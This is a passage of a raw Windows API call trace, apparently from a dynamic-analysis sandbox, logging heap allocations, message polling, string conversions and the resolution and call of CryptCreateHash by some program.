CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.963] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.964] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.964] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.964] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0266.964] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.964] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.964] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.964] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.964] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.964] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.965] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.965] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0266.965] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.965] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0266.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51e50, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0266.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.966] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0266.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0266.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0266.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0266.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0266.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0266.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0266.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0266.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0266.966] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0266.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0266.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0266.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0266.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0266.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0266.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0266.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0266.969] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0266.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0266.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0266.970] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0266.970] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.970] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f28 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0266.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fa8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0266.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.971] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0266.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0266.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fd8 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0266.973] RtlAllocateHeap 